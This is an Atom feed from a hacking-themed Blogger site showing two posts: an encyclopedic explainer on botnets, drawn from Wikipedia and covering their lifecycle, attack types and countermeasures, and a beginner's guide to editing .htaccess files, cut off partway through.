<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5102751654897812866</id><updated>2014-01-08T12:07:00.197+05:30</updated><category term="Basics"/><category term="Tricks"/><category term="How to"/><category term="Hacking"/><category term="Hack"/><category term="IP Address"/><category term="Tutorial"/><category term="Facebook"/><category term="virus"/><category term="Miscellaneous"/><category term="Security"/><category term="infect"/><category term="Metasploit"/><category term="Batch programming"/><category term="Botnets"/><category term="Cain"/><category term="DNS Poisoning"/><category term="Dorks"/><category term="Exploit"/><category term="Keylogger"/><category term="Linux"/><category term="Phishing"/><category term="Programming"/><category term="SQLi"/><category term="Server"/><category term="VLC media Player"/><category term="Wifi"/><category term="htaccess"/><title type='text'>Walk With-[Geeks]-</title><subtitle type='html'>A place where Geeky knowledge is Shared and Upgraded.. :)</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default?start-index=26&amp;max-results=25'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>26</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-6973476418666612135</id><published>2012-05-01T15:17:00.002+05:30</published><updated>2012-05-01T15:21:55.016+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basics"/><category scheme="http://www.blogger.com/atom/ns#" term="Botnets"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="infect"/><category scheme="http://www.blogger.com/atom/ns#" term="Miscellaneous"/><title type='text'>Botnets Explained - Part 1</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;  Botnets&lt;/h2&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-nPtiiim09ak/T5-xAO4LeKI/AAAAAAAAAFo/_1f57XX6BHE/s1600/botnet.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;238&quot; src=&quot;http://2.bp.blogspot.com/-nPtiiim09ak/T5-xAO4LeKI/AAAAAAAAAFo/_1f57XX6BHE/s320/botnet.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;The main drivers for botnets are for recognition and financial gain.&lt;br /&gt;&lt;br /&gt;The larger the botnet, the more ‘kudos’ the harder can claim to have&lt;br /&gt;&lt;br /&gt;among the underground community. The bot herder will also ‘rent’ the&lt;br /&gt;&lt;br /&gt;services of the botnet out to third parties, usually for sending out&lt;br /&gt;&lt;br /&gt;spam messages, or for performing a denial of service attack against a&lt;br /&gt;&lt;br /&gt;remote target. Due to the large numbers of compromised machines&lt;br /&gt;&lt;br /&gt;within the botnet huge volumes of traffic (either email or denial of&lt;br /&gt;&lt;br /&gt;service) can be generated. However, in recent times the volumes of&lt;br /&gt;&lt;br /&gt;spam originating from a single compromised host have dropped in order&lt;br /&gt;&lt;br /&gt;to thwart anti-spam detection algorithms – a larger number of&lt;br /&gt;&lt;br /&gt;compromised hosts send a smaller amount of messages in order to evade&lt;br /&gt;&lt;br /&gt;detection by anti-spam techniques.&lt;br /&gt;&lt;br /&gt;Botnets have become a significant part of the Internet, albeit&lt;br /&gt;&lt;br /&gt;increasingly hidden. Due to most conventional IRC networks taking&lt;br /&gt;&lt;br /&gt;measures and blocking access to previously-hosted botnets,&lt;br /&gt;&lt;br /&gt;controllers must now find their own servers. Often, a botnet will&lt;br /&gt;&lt;br /&gt;include a variety of connections and network types. Sometimes a&lt;br /&gt;&lt;br /&gt;controller will hide an IRC server installation on an educational or&lt;br /&gt;&lt;br /&gt;corporate site where high-speed connections can support a large&lt;br /&gt;&lt;br /&gt;number of other bots. Exploitation of this method of using a bot to&lt;br /&gt;&lt;br /&gt;host other bots has proliferated only recently as most script kiddies&lt;br /&gt;&lt;br /&gt;do not have the knowledge to take advantage of it.&lt;br /&gt;&lt;br /&gt;Several botnets have been found and removed from the Internet. The&lt;br /&gt;&lt;br /&gt;Dutch police found a 1.5 million node botnet and the Norwegian ISP&lt;br /&gt;&lt;br /&gt;Telenor disbanded a 10,000-node botnet. In July 2010, the FBI&lt;br /&gt;&lt;br /&gt;arrested a 23-year old Slovenian held responsible for the malicious&lt;br /&gt;&lt;br /&gt;software that integrated an estimated 12 million computers into a&lt;br /&gt;&lt;br /&gt;botnet. Large coordinated international efforts to shut down botnets&lt;br /&gt;&lt;br /&gt;have also been initiated.It has been estimated that up to one quarter&lt;br /&gt;&lt;br /&gt;of all personal computers connected to the internet may be part of a&lt;br /&gt;&lt;br /&gt;botnet.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Botnet lifecycle&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;* Bot-herder configures initial bot parameters such as infection&lt;br /&gt;&lt;br /&gt;vectors, payload, stealth, C&amp;amp;C details&lt;br /&gt;* Register a DDNS&lt;br /&gt;* Register a static IP&lt;br /&gt;* Bot-herder launches or seeds new bot(s)&lt;br /&gt;* Bots spread&lt;br /&gt;* Causes an increase of DDoS being sent to the slave&lt;br /&gt;* Losing bots to rival botnets&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Types of attacks&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;* Denial-of-service attacks where multiple systems autonomously&lt;br /&gt;&lt;br /&gt;access a single Internet system or service in a way that appears&lt;br /&gt;&lt;br /&gt;legitimate, but much more frequently than normal use and cause the&lt;br /&gt;&lt;br /&gt;system to become busy.&lt;br /&gt;* Adware exists to advertise some commercial entity actively and&lt;br /&gt;&lt;br /&gt;without the user&#39;s permission or awareness, for example by replacing&lt;br /&gt;&lt;br /&gt;banner ads on web pages with those of another content provider.&lt;br /&gt;* Spyware is software which sends information to its creators about a&lt;br /&gt;&lt;br /&gt;user&#39;s activities – typically passwords, credit card numbers and&lt;br /&gt;&lt;br /&gt;other information that can be sold on the black market. Compromised&lt;br /&gt;&lt;br /&gt;machines that are located within a corporate network can be worth&lt;br /&gt;&lt;br /&gt;more to the bot herder, as they can often gain access to confidential&lt;br /&gt;&lt;br /&gt;information held within that company. There have been several&lt;br /&gt;&lt;br /&gt;targeted attacks on large corporations with the aim of stealing&lt;br /&gt;&lt;br /&gt;sensitive information, one such example is the Aurora botnet.&lt;br /&gt;* E-mail spam are e-mail messages disguised as messages from people,&lt;br /&gt;&lt;br /&gt;but are either advertising, annoying, or malicious in nature.&lt;br /&gt;* Click fraud is the user&#39;s computer visiting websites without the&lt;br /&gt;&lt;br /&gt;user&#39;s awareness to create false web traffic for the purpose of&lt;br /&gt;&lt;br /&gt;personal or commercial gain.&lt;br /&gt;* Access number replacements are where the botnet operator replaces&lt;br /&gt;&lt;br /&gt;the access numbers of a group of dial-up bots to that of a slave&#39;s&lt;br /&gt;&lt;br /&gt;phone number. Given enough bots partake in this attack, the slave is&lt;br /&gt;&lt;br /&gt;consistently bombarded with phone calls attempting to connect to the&lt;br /&gt;&lt;br /&gt;internet. Having very little to defend against this attack, most are&lt;br /&gt;&lt;br /&gt;forced into changing their phone numbers (land line, cell phone,&lt;br /&gt;&lt;br /&gt;etc).&lt;br /&gt;* Fast flux is a DNS technique used by botnets to hide phishing and&lt;br /&gt;&lt;br /&gt;malware delivery sites behind an ever-changing network of compromised&lt;br /&gt;&lt;br /&gt;hosts acting as proxies.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Preventive measures&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;If a machine receives a denial-of-service attack from a botnet, few&lt;br /&gt;&lt;br /&gt;choices exist. Given the general geographic dispersal of botnets, it&lt;br /&gt;&lt;br /&gt;becomes difficult to identify a pattern of offending machines, and&lt;br /&gt;&lt;br /&gt;the sheer volume of IP addresses does not lend itself to the&lt;br /&gt;&lt;br /&gt;filtering of individual cases. Passive OS fingerprinting can identify&lt;br /&gt;&lt;br /&gt;attacks originating from a botnet: network administrators can&lt;br /&gt;&lt;br /&gt;configure newer firewall equipment to take action on a botnet attack&lt;br /&gt;&lt;br /&gt;by using information obtained from passive OS fingerprinting. The&lt;br /&gt;&lt;br /&gt;most serious preventive measures utilize rate-based intrusion&lt;br /&gt;&lt;br /&gt;prevention systems implemented with specialized hardware.&lt;br /&gt;&lt;br /&gt;Some botnets use free DNS hosting services such as DynDns.org, No-&lt;br /&gt;&lt;br /&gt;IP.com, and Afraid.org to point a subdomain towards an IRC server&lt;br /&gt;&lt;br /&gt;that will harbor the bots. While these free DNS services do not&lt;br /&gt;&lt;br /&gt;themselves host attacks, they provide reference points (often hard-&lt;br /&gt;&lt;br /&gt;coded into the botnet executable). Removing such services can cripple&lt;br /&gt;&lt;br /&gt;an entire botnet. Recently, these companies have undertaken efforts&lt;br /&gt;&lt;br /&gt;to purge their domains of these subdomains. The botnet community&lt;br /&gt;&lt;br /&gt;refers to such efforts as &quot;nullrouting&quot;, because the DNS hosting&lt;br /&gt;&lt;br /&gt;services usually re-direct the offending subdomains to an&lt;br /&gt;&lt;br /&gt;inaccessible IP address.&lt;br /&gt;&lt;br /&gt;The botnet server structure mentioned above has inherent&lt;br /&gt;&lt;br /&gt;vulnerabilities and problems. For example, if one was to find one&lt;br /&gt;&lt;br /&gt;server with one botnet channel, often all other servers, as well as&lt;br /&gt;&lt;br /&gt;other bots themselves, will be revealed. If a botnet server structure&lt;br /&gt;&lt;br /&gt;lacks redundancy, the disconnection of one server will cause the&lt;br /&gt;&lt;br /&gt;entire botnet to collapse, at least until the controller(s) decides&lt;br /&gt;&lt;br /&gt;on a new hosting space. However, more recent IRC server software&lt;br /&gt;&lt;br /&gt;includes features to mask other connected servers and bots, so that a&lt;br /&gt;&lt;br /&gt;discovery of one channel will not lead to disruption of the botnet.&lt;br /&gt;&lt;br /&gt;Several security companies such as Afferent Security Labs, Symantec,&lt;br /&gt;&lt;br /&gt;Trend Micro, FireEye, Simplicita and Damballa have announced&lt;br /&gt;&lt;br /&gt;offerings to stop botnets. While some, like Norton AntiBot&lt;br /&gt;&lt;br /&gt;(discontinued), are aimed at consumers, most are aimed to protect&lt;br /&gt;&lt;br /&gt;enterprises and/or ISPs. The host-based techniques use heuristics to&lt;br /&gt;&lt;br /&gt;try to identify bot behavior that has bypassed conventional anti-&lt;br /&gt;&lt;br /&gt;virus software. Network-based approaches tend to use the techniques&lt;br /&gt;&lt;br /&gt;described above; shutting down C&amp;amp;C servers, nullrouting DNS entries,&lt;br /&gt;&lt;br /&gt;or completely shutting down IRC servers.&lt;br /&gt;&lt;br /&gt;Newer botnets are almost entirely P2P, with command-and-control&lt;br /&gt;&lt;br /&gt;embedded into the botnet itself. By being dynamically updateable and&lt;br /&gt;&lt;br /&gt;variable they can evade having any single point of failure.&lt;br /&gt;&lt;br /&gt;Commanders can be identified solely through secure keys and all data&lt;br /&gt;&lt;br /&gt;except the binary itself can be encrypted. For example a spyware&lt;br /&gt;&lt;br /&gt;program may encrypt all suspected passwords with a public key hard&lt;br /&gt;&lt;br /&gt;coded or distributed into the bot software. Only with the private&lt;br /&gt;&lt;br /&gt;key, which only the commander has, can the data that the bot has&lt;br /&gt;&lt;br /&gt;captured be read.&lt;br /&gt;&lt;br /&gt;Newer botnets have even been capable of detecting and reacting to&lt;br /&gt;&lt;br /&gt;attempts to figure out how they work. A large botnet that can detect&lt;br /&gt;&lt;br /&gt;that it is being studied can even DDoS those studying it off the&lt;br /&gt;&lt;br /&gt;internet.&lt;br /&gt;&lt;br /&gt;There is an effort by researchers at Sandia National Laboratories to&lt;br /&gt;&lt;br /&gt;analyze the behavior of these botnets by simultaneously running one&lt;br /&gt;&lt;br /&gt;million Linux kernels as virtual machines on a 4,480-node Dell high-&lt;br /&gt;&lt;br /&gt;performance computer cluster.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;- Leached from&amp;nbsp;Ganja ツ and &lt;a href=&quot;http://en.wikipedia.org/wiki/Botnet&quot; target=&quot;_blank&quot;&gt;Wiki&lt;span id=&quot;goog_470940643&quot;&gt;&lt;/span&gt;&lt;span id=&quot;goog_470940644&quot;&gt;&lt;/span&gt;&lt;/a&gt;.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Later on i&#39;ll be posting some more info about Botnets. :)&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/6973476418666612135/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/05/botnets-explained-part-1.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/6973476418666612135'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/6973476418666612135'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/05/botnets-explained-part-1.html' title='Botnets Explained - Part 1'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-nPtiiim09ak/T5-xAO4LeKI/AAAAAAAAAFo/_1f57XX6BHE/s72-c/botnet.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-1281051983230891971</id><published>2012-04-05T17:55:00.000+05:30</published><updated>2012-04-05T17:55:36.787+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basics"/><category scheme="http://www.blogger.com/atom/ns#" term="htaccess"/><category scheme="http://www.blogger.com/atom/ns#" term="Programming"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type='text'>Htaccess File Explained</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Comic Sans MS&amp;quot;; font-size: 17.0pt; mso-bidi-font-size: 12.0pt;&quot;&gt;Htaccess File Explained&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-usWFOM7yinQ/T32O5EBlBDI/AAAAAAAAAFc/l21ZY-bSTmc/s1600/htaccess+w4r-b0y.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-usWFOM7yinQ/T32O5EBlBDI/AAAAAAAAAFc/l21ZY-bSTmc/s1600/htaccess+w4r-b0y.gif&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;Intro&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Hypertext Access, commonly shortened to&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;strong&gt;htaccess&lt;/strong&gt;, is a configuration file which controls the directory it is placed in and all the subdirectories underneath it. It’s an incredibly useful feature which allows webmasters to control how many aspects of their website works. You can redirect pages, change the extensions of pages, password protect directories and much much more.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;In this&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;strong&gt;htaccess guide&lt;/strong&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;I will show you some of the basic tricks and tips which will help you with your website.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;So what is htaccess?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;The htaccess file is a configuration file which is used on Apache based web servers to control many features of the server. The file itself is just a small basic text file and can be edited via your hosts file manager or alternatively you can download the file, edit it and reupload it.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;If you have installed a script before then chances are you have had to edit the .htaccess file at one point or another. The .htaccess file gives you a lot of control and lets you easily redirect pages, password protect directories and much more. Before I go through some tutorials which show you how to use htaccess, I think it is necessary to show you how you edit the file.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Where is the .htaccess file?&lt;/span&gt;&lt;/strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;The first thing you need to do is find out if your host actually lets you edit htaccess files. Because of security problems which can arise, many hosts stop their customers from editing it the .htaccess file. Therefore you should check the Frequently Asked Questions area of your host to see if you have permission to edit the file (failing that, email them).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Some operating systems may not show the .htaccess file on your computer so you may need to make sure settings show hidden files as well. Likewise some FTP Clients will not show the .htaccess file when you connect to your host so you need to make sure that your FTP is set up to show hidden files too (I personally use&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://filezilla-project.org/&quot;&gt;FileZilla&lt;/a&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;and that shows .htaccess by default).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Better safe than sorry&lt;/span&gt;&lt;/strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;The .htaccess gives you a lot of control over what happens on your site but accidents do happen so make sure you keep a backup or best create a copy of the htacess file of the last working .htaccess file you used before attempting to modify it in anyway. This way you can recover quickly from a site crash!&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Htaccess is also extremely sensitive. A missing semi colon, incorrect letter or an extra backslash can mess everything up so you need to make sure that what you enter is correct 100%. Don’t let this scare you off though, as long as you take your time and make sure everything is input correctly you can enter just a few lines to htaccess to achieve things which most php scripts take a page to do.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;To learn more about htaccess simply click on one of the articles at the right hand side. Good luck&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shapetype  id=&quot;_x0000_t75&quot; coordsize=&quot;21600,21600&quot; o:spt=&quot;75&quot; o:preferrelative=&quot;t&quot;  path=&quot;m@4@5l@4@11@9@11@9@5xe&quot; filled=&quot;f&quot; stroked=&quot;f&quot;&gt; &lt;v:stroke joinstyle=&quot;miter&quot;/&gt; &lt;v:formulas&gt;  &lt;v:f eqn=&quot;if lineDrawn pixelLineWidth 0&quot;/&gt;  &lt;v:f eqn=&quot;sum @0 1 0&quot;/&gt;  &lt;v:f eqn=&quot;sum 0 0 @1&quot;/&gt;  &lt;v:f eqn=&quot;prod @2 1 2&quot;/&gt;  &lt;v:f eqn=&quot;prod @3 21600 pixelWidth&quot;/&gt;  &lt;v:f eqn=&quot;prod @3 21600 pixelHeight&quot;/&gt;  &lt;v:f eqn=&quot;sum @0 0 1&quot;/&gt;  &lt;v:f eqn=&quot;prod @6 1 2&quot;/&gt;  &lt;v:f eqn=&quot;prod @7 21600 pixelWidth&quot;/&gt;  &lt;v:f eqn=&quot;sum @8 21600 0&quot;/&gt;  &lt;v:f eqn=&quot;prod @7 21600 pixelHeight&quot;/&gt;  &lt;v:f eqn=&quot;sum @10 21600 0&quot;/&gt; &lt;/v:formulas&gt; &lt;v:path o:extrusionok=&quot;f&quot; gradientshapeok=&quot;t&quot; o:connecttype=&quot;rect&quot;/&gt; &lt;o:lock v:ext=&quot;edit&quot; aspectratio=&quot;t&quot;/&gt;&lt;/v:shapetype&gt;&lt;v:shape id=&quot;_x0000_i1025&quot; type=&quot;#_x0000_t75&quot; alt=&quot;:)&quot; style=&#39;width:11.25pt;  height:11.25pt&#39;&gt; &lt;v:imagedata src=&quot;file:///C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\msohtml1\01\clip_image001.gif&quot;   o:href=&quot;http://www.htaccessbasics.com/wp-includes/images/smilies/icon_smile.gif&quot;/&gt;&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;img alt=&quot;:)&quot; border=&quot;0&quot; height=&quot;15&quot; src=&quot;file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/01/clip_image001.gif&quot; v:shapes=&quot;_x0000_i1025&quot; width=&quot;15&quot; /&gt;&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;strong&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #faf8f5; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial; font-size: 13pt;&quot;&gt;How do you edit the .htaccess file?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Before you upload an .htaccess file to your server, make sure there is not already one there. Your host panel or perhaps a script you have uploaded may have already changed the htaccess for some reason so you don’t want to overwrite it as doing so could change something important on your site. For example, in cpanel, you can setup 301 redirects very easily but this tool is simply a script which changes the .htaccess for you. So even though you may not realise it, when you use the redirect script via cpanel, it updates your .htaccess file for you and it’s the .htaccess file which controls the redirect for you (the redirect tool just makes it easier for those who are not familar with .htaccess).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;So if there is an .htaccess file there already, you want to download that and edit it before reuploading. This will ensure that nothing you have setup previously is changed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;If there is no .htaccess file there then you need to create one. Thankfully, this is very easy to do. All you need to do is open a text editor and save a blank document as&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;strong&gt;.htaccess&lt;/strong&gt;. Save the file exactly as it is stated there in bold ie. there is no writing before the extension. You need to save it as&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;strong&gt;.htaccess&lt;/strong&gt;and not htaccess.txt or document1.htaccess or whatever.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;When uploading you should always :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 6.0pt; margin-left: 30.0pt; margin-right: 30.0pt; margin-top: 0in; mso-list: l4 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family: Symbol; font-size: 10pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: 